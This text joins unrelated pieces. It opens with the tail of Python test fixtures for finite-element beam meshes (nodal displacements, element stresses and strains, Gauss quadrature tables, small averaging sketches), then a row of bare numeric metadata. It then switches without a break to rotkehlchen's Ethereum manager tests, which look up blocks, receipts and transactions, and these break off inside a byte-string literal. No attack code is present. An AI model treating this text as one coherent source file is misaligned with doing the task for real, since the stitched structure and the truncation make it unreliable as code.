[-10., 25., 0.], # 5
[-5., 25., 0.], # 6
[-5., 30., 0.], # 15
[-10., 30., 0.], # 14
[-5., 25., 0.], # 6
[0., 25., 0.], # 7
[0., 30., 0.], # 16
[-5., 30., 0.], # 15
[0., 25., 0.], # 7
[5., 25., 0.], # 8
[5., 30., 0.], # 17
[0., 30., 0.], # 16
[5., 25., 0.], # 8
[10., 25., 0.], # 9
[10., 30., 0.], # 18
[5., 30., 0.], # 17
]),
columns=['x', 'y', 'z'],
index=beam_2d_squ_mesh_index
)
beam_2d_squ_node_displacement = pd.DataFrame(
data=np.array(
[
[-800.000E-36, -94.4166E-36, 0.0],
[-7.79987E-06, -7.80086E-06, 0.0],
[-14.5600E-06, -30.1635E-06, 0.0],
[-20.2799E-06, -65.0026E-06, 0.0],
[-24.9600E-06, -110.247E-06, 0.0],
[-28.5999E-06, -163.804E-06, 0.0],
[-31.2000E-06, -223.611E-06, 0.0],
[-32.7599E-06, -287.566E-06, 0.0],
[-33.2800E-06, -353.614E-06, 0.0],
[800.000E-36, -5.58338E-36, 0.0],
[7.80013E-06, -7.80174E-06, 0.0],
[14.5600E-06, -30.1617E-06, 0.0],
[20.2801E-06, -65.0052E-06, 0.0],
[24.9600E-06, -110.243E-06, 0.0],
[28.6001E-06, -163.809E-06, 0.0],
[31.2000E-06, -223.605E-06, 0.0],
[32.7601E-06, -287.572E-06, 0.0],
[33.2800E-06, -353.607E-06, 0.0]
]
),
columns=['dx', 'dy', 'dz'],
index=pd.Index(np.arange(1, 19), name="node_id")
)
beam_3d_hex_element_volume = pd.DataFrame(
data=[1e3, 1e3, 1e3, 1e3],
columns=['Ve'],
index=pd.Index([1, 2, 3, 4], name='element_id')
)
beam_3d_hex_stress_element_volume = pd.DataFrame(
data=np.array([
[4.534151e-13, 1.795928, 0.056395, -2.0, 1.488919e-12, -2.761504e-12, 1e3],
[4.534151e-13, 1.795928, 0.056395, -2.0, 1.488919e-12, -2.761504e-12, 1e3],
[4.534151e-13, 1.795928, 0.056395, -2.0, 1.488919e-12, -2.761504e-12, 1e3],
[4.534151e-13, 1.795928, 0.056395, -2.0, 1.488919e-12, -2.761504e-12, 1e3],
[4.534151e-13, 1.795928, 0.056395, -2.0, 1.488919e-12, -2.761504e-12, 1e3],
[4.534151e-13, 1.795928, 0.056395, -2.0, 1.488919e-12, -2.761504e-12, 1e3],
[4.534151e-13, 1.795928, 0.056395, -2.0, 1.488919e-12, -2.761504e-12, 1e3],
[4.534151e-13, 1.795928, 0.056395, -2.0, 1.488919e-12, -2.761504e-12, 1e3],
[4.690692e-14, -1.821834, -0.049344, -2.0, -1.056252e-12, -2.583355e-12, 1e3],
[4.690692e-14, -1.821834, -0.049344, -2.0, -1.056252e-12, -2.583355e-12, 1e3],
[4.690692e-14, -1.821834, -0.049344, -2.0, -1.056252e-12, -2.583355e-12, 1e3],
[4.690692e-14, -1.821834, -0.049344, -2.0, -1.056252e-12, -2.583355e-12, 1e3],
[4.690692e-14, -1.821834, -0.049344, -2.0, -1.056252e-12, -2.583355e-12, 1e3],
[4.690692e-14, -1.821834, -0.049344, -2.0, -1.056252e-12, -2.583355e-12, 1e3],
[4.690692e-14, -1.821834, -0.049344, -2.0, -1.056252e-12, -2.583355e-12, 1e3],
[4.690692e-14, -1.821834, -0.049344, -2.0, -1.056252e-12, -2.583355e-12, 1e3],
[8.767431e-13, 1.874053, 0.035027, -2.0, 2.519726e-12, -1.425290e-12, 1e3],
[8.767431e-13, 1.874053, 0.035027, -2.0, 2.519726e-12, -1.425290e-12, 1e3],
[8.767431e-13, 1.874053, 0.035027, -2.0, 2.519726e-12, -1.425290e-12, 1e3],
[8.767431e-13, 1.874053, 0.035027, -2.0, 2.519726e-12, -1.425290e-12, 1e3],
[8.767431e-13, 1.874053, 0.035027, -2.0, 2.519726e-12, -1.425290e-12, 1e3],
[8.767431e-13, 1.874053, 0.035027, -2.0, 2.519726e-12, -1.425290e-12, 1e3],
[8.767431e-13, 1.874053, 0.035027, -2.0, 2.519726e-12, -1.425290e-12, 1e3],
[8.767431e-13, 1.874053, 0.035027, -2.0, 2.519726e-12, -1.425290e-12, 1e3],
[2.789879e-12, -1.953409, -0.013005, -2.0, 2.059563e-12, 4.052017e-13, 1e3],
[2.789879e-12, -1.953409, -0.013005, -2.0, 2.059563e-12, 4.052017e-13, 1e3],
[2.789879e-12, -1.953409, -0.013005, -2.0, 2.059563e-12, 4.052017e-13, 1e3],
[2.789879e-12, -1.953409, -0.013005, -2.0, 2.059563e-12, 4.052017e-13, 1e3],
[2.789879e-12, -1.953409, -0.013005, -2.0, 2.059563e-12, 4.052017e-13, 1e3],
[2.789879e-12, -1.953409, -0.013005, -2.0, 2.059563e-12, 4.052017e-13, 1e3],
[2.789879e-12, -1.953409, -0.013005, -2.0, 2.059563e-12, 4.052017e-13, 1e3],
[2.789879e-12, -1.953409, -0.013005, -2.0, 2.059563e-12, 4.052017e-13, 1e3],
]),
columns=['S11', 'S22', 'S33', 'S12', 'S13', 'S23', 'V_e'],
index=pd.MultiIndex.from_arrays(np.array([
[1, 5],
[1, 6],
[1, 8],
[1, 7],
[1, 1],
[1, 2],
[1, 4],
[1, 3],
[2, 9],
[2, 10],
[2, 12],
[2, 11],
[2, 5],
[2, 6],
[2, 8],
[2, 7],
[3, 13],
[3, 14],
[3, 16],
[3, 15],
[3, 9],
[3, 10],
[3, 12],
[3, 11],
[4, 17],
[4, 18],
[4, 20],
[4, 19],
[4, 13],
[4, 14],
[4, 16],
[4, 15],
]).T, names=['element_id', 'node_id'])
)
beam_2d_squ_element_nodal_stress = pd.DataFrame(
data=[
[-390.938E-12, -17.7838, 0., -20., 0., 0.],
[-393.265E-12, -17.7838, 0., -20., 0., 0.],
[-393.265E-12, -17.7838, 0., -20., 0., 0.],
[-390.938E-12, -17.7838, 0., -20., 0., 0.],
[-393.265E-12, 17.8522, 0., -20., 0., 0.],
[-300.185E-12, 17.8522, 0., -20., 0., 0.],
[-300.185E-12, 17.8522, 0., -20., 0., 0.],
[-393.265E-12, 17.8522, 0., -20., 0., 0.],
[-300.185E-12, -17.9894, 0., -20., 0., 0.],
[-316.474E-12, -17.9894, 0., -20., 0., 0.],
[-316.474E-12, -17.9894, 0., -20., 0., 0.],
[-300.185E-12, -17.9894, 0., -20., 0., 0.],
[-316.474E-12, 18.1959, 0., -20., 0., 0.],
[-37.2320E-12, 18.1959, 0., -20., 0., 0.],
[-37.2320E-12, 18.1959, 0., -20., 0., 0.],
[-316.474E-12, 18.1959, 0., -20., 0., 0.],
[-37.2320E-12, -18.4724, 0., -20., 0., 0.],
[567.792E-12, -18.4724, 0., -20., 0., 0.],
[567.792E-12, -18.4724, 0., -20., 0., 0.],
[-37.2320E-12, -18.4724, 0., -20., 0., 0.],
[567.792E-12, 18.8200, 0., -20., 0., 0.],
[353.706E-12, 18.8200, 0., -20., 0., 0.],
[353.706E-12, 18.8200, 0., -20., 0., 0.],
[567.792E-12, 18.8200, 0., -20., 0., 0.],
[353.706E-12, -19.2400, 0., -20., 0., 0.],
[-195.469E-12, -19.2400, 0., -20., 0., 0.],
[-195.469E-12, -19.2400, 0., -20., 0., 0.],
[353.706E-12, -19.2400, 0., -20., 0., 0.],
[-195.469E-12, 19.7342, 0., -20., 0., 0.],
[-316.474E-12, 19.7342, 0., -20., 0., 0.],
[-316.474E-12, 19.7342, 0., -20., 0., 0.],
[-195.469E-12, 19.7342, 0., -20., 0., 0.],
],
columns=['S11', 'S22', 'S33', 'S12', 'S13', 'S23'],
index=beam_2d_squ_mesh_index
)
beam_2d_squ_element_nodal_strain = pd.DataFrame(
data=[
[26.6756E-12, -88.9187E-12, 0., -260.000E-12, 0., 0.],
[26.6756E-12, -88.9187E-12, 0., -260.000E-12, 0., 0.],
[26.6756E-12, -88.9187E-12, 0., -260.000E-12, 0., 0.],
[26.6756E-12, -88.9187E-12, 0., -260.000E-12, 0., 0.],
[-26.7783E-12, 89.2611E-12, 0., -260.000E-12, 0., 0.],
[-26.7783E-12, 89.2611E-12, 0., -260.000E-12, 0., 0.],
[-26.7783E-12, 89.2611E-12, 0., -260.000E-12, 0., 0.],
[-26.7783E-12, 89.2611E-12, 0., -260.000E-12, 0., 0.],
[26.9841E-12, -89.9470E-12, 0., -260.000E-12, 0., 0.],
[26.9841E-12, -89.9470E-12, 0., -260.000E-12, 0., 0.],
[26.9841E-12, -89.9470E-12, 0., -260.000E-12, 0., 0.],
[26.9841E-12, -89.9470E-12, 0., -260.000E-12, 0., 0.],
[-27.2938E-12, 90.9793E-12, 0., -260.000E-12, 0., 0.],
[-27.2938E-12, 90.9793E-12, 0., -260.000E-12, 0., 0.],
[-27.2938E-12, 90.9793E-12, 0., -260.000E-12, 0., 0.],
[-27.2938E-12, 90.9793E-12, 0., -260.000E-12, 0., 0.],
[27.7085E-12, -92.3618E-12, 0., -260.000E-12, 0., 0.],
[27.7085E-12, -92.3618E-12, 0., -260.000E-12, 0., 0.],
[27.7085E-12, -92.3618E-12, 0., -260.000E-12, 0., 0.],
[27.7085E-12, -92.3618E-12, 0., -260.000E-12, 0., 0.],
[-28.2300E-12, 94.0999E-12, 0., -260.000E-12, 0., 0.],
[-28.2300E-12, 94.0999E-12, 0., -260.000E-12, 0., 0.],
[-28.2300E-12, 94.0999E-12, 0., -260.000E-12, 0., 0.],
[-28.2300E-12, 94.0999E-12, 0., -260.000E-12, 0., 0.],
[28.8601E-12, -96.2002E-12, 0., -260.000E-12, 0., 0.],
[28.8601E-12, -96.2002E-12, 0., -260.000E-12, 0., 0.],
[28.8601E-12, -96.2002E-12, 0., -260.000E-12, 0., 0.],
[28.8601E-12, -96.2002E-12, 0., -260.000E-12, 0., 0.],
[-29.6013E-12, 98.6710E-12, 0., -260.000E-12, 0., 0.],
[-29.6013E-12, 98.6710E-12, 0., -260.000E-12, 0., 0.],
[-29.6013E-12, 98.6710E-12, 0., -260.000E-12, 0., 0.],
[-29.6013E-12, 98.6710E-12, 0., -260.000E-12, 0., 0.]
],
columns=['E11', 'E22', 'E33', 'E12', 'E13', 'E23'],
index=beam_2d_squ_mesh_index
)
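# The element-nodal fixtures above key every row by an (element_id, node_id)
# MultiIndex, so each shared node is repeated once per adjacent element. Below
# is a minimal, self-contained sketch of averaging such duplicates into unique
# nodal values, assuming that is how a consumer reduces them; the tiny demo
# frame is hypothetical and not taken from the fixtures.
demo_element_nodal = pd.DataFrame(
    data=[[1.0], [3.0], [2.0], [4.0]],
    columns=['S11'],
    index=pd.MultiIndex.from_tuples(
        [(1, 1), (2, 1), (1, 2), (2, 2)],
        names=['element_id', 'node_id'],
    ),
)
# Shared nodes appear once per adjacent element; group on node_id and average.
demo_nodal_mean = demo_element_nodal.groupby(level='node_id').mean()
# node_id 1 averages the rows from elements 1 and 2 -> 2.0; node_id 2 -> 3.0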
integration_type_content = {
'TYPE1': [0, 'GAUSS_TRIANGLE_3', 3, 2, 0.0,
[0.166667, 0.166667, 0.666667, 0.166667, 0.166667, 0.666667],
[0.333333, 0.333333, 0.333333], []],
'TYPE2': [1, 'GAUSS_QUAD_9', 9, 2, 0.0,
[-0.774597, -0.774597, 0, -0.774597, 0.774597, -0.774597, -0.774597, 0, 0, 0,
0.774597, 0, -0.774597, 0.774597, 0, 0.774597, 0.774597, 0.774597],
[0.308642, 0.493827, 0.308642, 0.493827, 0.790123, 0.493827, 0.308642, 0.493827, 0.308642], []]
}
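# A quick sanity sketch for the quadrature table above, assuming the layout
# read off the 'TYPE2' literal: index 5 holds the nine Gauss points flattened
# as [x0, y0, x1, y1, ...] and index 6 holds one weight per point. A 3x3
# Gauss rule is exact for polynomials up to degree five on [-1, 1]^2, so
# x**2 * y**2 should reproduce its exact integral 4/9 up to the rounding of
# the tabulated values. Illustrative only, not part of the fixture data.
gauss_pts = np.array(integration_type_content['TYPE2'][5]).reshape(-1, 2)
gauss_wts = np.array(integration_type_content['TYPE2'][6])
quad = float(np.sum(gauss_wts * gauss_pts[:, 0]**2 * gauss_pts[:, 1]**2))
# quad differs from 4/9 only by the six-digit rounding of points and weights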
| 40.860349
| 120
| 0.460726
| 2,731
| 16,385
| 2.727938
| 0.096668
| 0.075168
| 0.05557
| 0.048322
| 0.840268
| 0.802013
| 0.793557
| 0.750872
| 0.727517
| 0.708993
| 0
| 0.510225
| 0.280745
| 16,385
| 400
| 121
| 40.9625
| 0.121935
| 0.004821
| 0
| 0.569948
| 0
| 0
| 0.015732
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005181
| 0
| 0.005181
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8687dacdb2a6369e2fd4b4b7b839c5a535e2c2df
| 24,401
|
py
|
Python
|
rotkehlchen/tests/unit/test_ethereum_manager.py
|
rotkehlchenio/rotkehlchen
|
98f49cd3ed26c641fec03b78eff9fe1872385fbf
|
[
"BSD-3-Clause"
] | 137
|
2018-03-05T11:53:29.000Z
|
2019-11-03T16:38:42.000Z
|
rotkehlchen/tests/unit/test_ethereum_manager.py
|
rotkehlchenio/rotkehlchen
|
98f49cd3ed26c641fec03b78eff9fe1872385fbf
|
[
"BSD-3-Clause"
] | 385
|
2018-03-08T12:43:41.000Z
|
2019-11-10T09:15:36.000Z
|
rotkehlchen/tests/unit/test_ethereum_manager.py
|
rotkehlchenio/rotkehlchen
|
98f49cd3ed26c641fec03b78eff9fe1872385fbf
|
[
"BSD-3-Clause"
] | 59
|
2018-03-08T10:08:27.000Z
|
2019-10-26T11:30:44.000Z
|
import os
import pytest
from rotkehlchen.chain.ethereum.constants import ZERO_ADDRESS
from rotkehlchen.chain.ethereum.manager import (
ETHEREUM_NODES_TO_CONNECT_AT_START,
OPEN_NODES,
OPEN_NODES_WEIGHT_MAP,
NodeName,
)
from rotkehlchen.chain.ethereum.structures import EthereumTxReceipt, EthereumTxReceiptLog
from rotkehlchen.constants.ethereum import ATOKEN_ABI, ERC20TOKEN_ABI, YEARN_YCRV_VAULT
from rotkehlchen.constants.misc import ONE, ZERO
from rotkehlchen.db.ethtx import DBEthTx
from rotkehlchen.fval import FVal
from rotkehlchen.tests.utils.checks import assert_serialized_dicts_equal
from rotkehlchen.tests.utils.ethereum import (
ETHEREUM_FULL_TEST_PARAMETERS,
ETHEREUM_TEST_PARAMETERS,
wait_until_all_nodes_connected,
)
from rotkehlchen.tests.utils.factories import make_ethereum_address
from rotkehlchen.types import (
BlockchainAccountData,
EthereumTransaction,
SupportedBlockchain,
deserialize_evm_tx_hash,
make_evm_tx_hash,
)
from rotkehlchen.utils.hexbytes import hexstring_to_bytes
@pytest.mark.parametrize(*ETHEREUM_TEST_PARAMETERS)
def test_get_block_by_number(ethereum_manager, call_order, ethereum_manager_connect_at_start):
wait_until_all_nodes_connected(
ethereum_manager_connect_at_start=ethereum_manager_connect_at_start,
ethereum=ethereum_manager,
)
block = ethereum_manager.get_block_by_number(10304885, call_order=call_order)
assert block['timestamp'] == 1592686213
assert block['number'] == 10304885
assert block['hash'] == '0xe2217ba1639c6ca2183f40b0f800185b3901faece2462854b3162d4c5077752c'
@pytest.mark.parametrize(*ETHEREUM_FULL_TEST_PARAMETERS)
def test_get_transaction_receipt(
ethereum_manager,
call_order,
ethereum_manager_connect_at_start,
database,
):
wait_until_all_nodes_connected(
ethereum_manager_connect_at_start=ethereum_manager_connect_at_start,
ethereum=ethereum_manager,
)
tx_hash = deserialize_evm_tx_hash('0x12d474b6cbba04fd1a14e55ef45b1eb175985612244631b4b70450c888962a89') # noqa: E501
result = ethereum_manager.get_transaction_receipt(tx_hash, call_order=call_order)
block_hash = '0x6f3a7838a8788c3371b88df170c3643d19bad896c915a7368681292882b6ad61'
assert result['blockHash'] == block_hash
assert len(result['logs']) == 2
assert result['gasUsed'] == 144046
assert result['blockNumber'] == 10840714
assert result['logs'][0]['blockNumber'] == 10840714
assert result['logs'][1]['blockNumber'] == 10840714
assert result['status'] == 1
assert result['transactionIndex'] == 110
assert result['logs'][0]['transactionIndex'] == 110
assert result['logs'][1]['transactionIndex'] == 110
assert result['logs'][0]['logIndex'] == 235
assert result['logs'][1]['logIndex'] == 236
from_addy = make_ethereum_address()
to_addy = make_ethereum_address()
database.add_blockchain_accounts(
blockchain=SupportedBlockchain.ETHEREUM,
account_data=[
BlockchainAccountData(address=from_addy),
BlockchainAccountData(address=to_addy),
],
)
db = DBEthTx(database)
db.add_ethereum_transactions(
[EthereumTransaction( # need to add the tx first
tx_hash=tx_hash,
timestamp=1, # all other fields don't matter for this test
block_number=1,
from_address=from_addy,
to_address=to_addy,
value=1,
gas=1,
gas_price=1,
gas_used=1,
input_data=b'',
nonce=1,
)],
relevant_address=from_addy,
)
    # Also test that the receipt can be stored in and retrieved from the DB.
    # This checks that responses from all node types (say openethereum) are
    # processed properly
db.add_receipt_data(result)
receipt = db.get_receipt(tx_hash)
assert receipt == EthereumTxReceipt(
tx_hash=tx_hash,
contract_address=None,
status=True,
type=0,
logs=[
EthereumTxReceiptLog(
log_index=235,
data=b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02T\x0b\xe4\x00', # noqa: E501
address='0x5bEaBAEBB3146685Dd74176f68a0721F91297D37',
removed=False,
topics=[
b'\xdd\xf2R\xad\x1b\xe2\xc8\x9bi\xc2\xb0h\xfc7\x8d\xaa\x95+\xa7\xf1c\xc4\xa1\x16(\xf5ZM\xf5#\xb3\xef', # noqa: E501
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00s(*c\xf0\xe3\xd7\xe9`EuB\x0fwsa\xec\xa3\xc8j', # noqa: E501
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb6 \xf1\x93ME\x84\xdd\xa6\x99\x9e\xdc\xad\xd3)\x81)dj\xa5', # noqa: E501
]), EthereumTxReceiptLog(
log_index=236,
data=b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb6 \xf1\x93ME\x84\xdd\xa6\x99\x9e\xdc\xad\xd3)\x81)dj\xa5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb6 \xf1\x93ME\x84\xdd\xa6\x99\x9e\xdc\xad\xd3)\x81)dj\xa5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00[\xea\xba\xeb\xb3\x14f\x85\xddt\x17oh\xa0r\x1f\x91)}7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02T\x0b\xe4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\xe0\xb6\xb3\xa7d\x00\x00', # noqa: E501
address='0x73282A63F0e3D7e9604575420F777361ecA3C86A',
removed=False,
topics=[b'\xd6\xd4\xf5h\x1c$l\x9fB\xc2\x03\xe2\x87\x97Z\xf1`\x1f\x8d\xf8\x03Z\x92Q\xf7\x9a\xab\\\x8f\t\xe2\xf8'], # noqa: E501
),
])
@pytest.mark.parametrize(*ETHEREUM_TEST_PARAMETERS)
def test_get_transaction_by_hash(ethereum_manager, call_order, ethereum_manager_connect_at_start):
wait_until_all_nodes_connected(
ethereum_manager_connect_at_start=ethereum_manager_connect_at_start,
ethereum=ethereum_manager,
)
result = ethereum_manager.get_transaction_by_hash(
hexstring_to_bytes('0x5b180e3dcc19cd29c918b98c876f19393e07b74c07fd728102eb6241db3c2d5c'),
call_order=call_order,
)
expected_tx = EthereumTransaction(
tx_hash=make_evm_tx_hash(b'[\x18\x0e=\xcc\x19\xcd)\xc9\x18\xb9\x8c\x87o\x199>\x07\xb7L\x07\xfdr\x81\x02\xebbA\xdb<-\\'), # noqa: E501
timestamp=1633128954,
block_number=13336285,
from_address='0x2F6789A208A05C762cA8d142A3df95d29C18b065',
to_address='0x7Be8076f4EA4A4AD08075C2508e481d6C946D12b',
value=33000000000000000,
gas=294144,
gas_price=66936353558,
gas_used=218523,
input_data=b"\xab\x83K\xab\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00{\xe8\x07oN\xa4\xa4\xad\x08\x07\\%\x08\xe4\x81\xd6\xc9F\xd1+\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00/g\x89\xa2\x08\xa0\\v,\xa8\xd1B\xa3\xdf\x95\xd2\x9c\x18\xb0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\x8d\xfa\x06\xdfX\x9a\x1e\x19W9\x1b\x86.\x02\xf7\x17X$\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00I_\x94rvt\x9c\xe6F\xf6\x8a\xc8\xc2HB\x00E\xcb{^\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00{\xe8\x07oN\xa4\xa4\xad\x08\x07\\%\x08\xe4\x81\xd6\xc9F\xd1+\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\x8d\xfa\x06\xdfX\x9a\x1e\x19W9\x1b\x86.\x02\xf7\x17X$\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00[2V\x96^|<\xf2n\x11\xfc\xaf)m\xfc\x88\x07\xc0\x10s\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00I_\x94rvt\x9c\xe6F\xf6\x8a\xc8\xc2HB\x00E\xcb{^\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u=S=\x96\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00aW\x91\x84\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x96\x18\xf8\xa6p,\x86\xbd?\xcf\x83\x8c3\xd3 
\x89\x9f1\xffaX\x1a\r|\xa0\xcb\x12\xad\xbeY\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u=S=\x96\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00aU\xa9E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00bDI$\x9d\xc420bKZ\xb5v\x96\xf6\xef\xa0hg\x993\x00\x07y\x07]\x83\xc6\xd2I\x1c\x87\x19\x13\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x02\xe0\x9f\xaa\xce\x1aZ\xaf\\'\xb7&\x99l\x10\xe7u4\x11\xc6V\x17\xb3\xb5)z\xd5\x04/7\xd8\x04\x07y\xb1\xa8\xfe\x0c\x1c\xa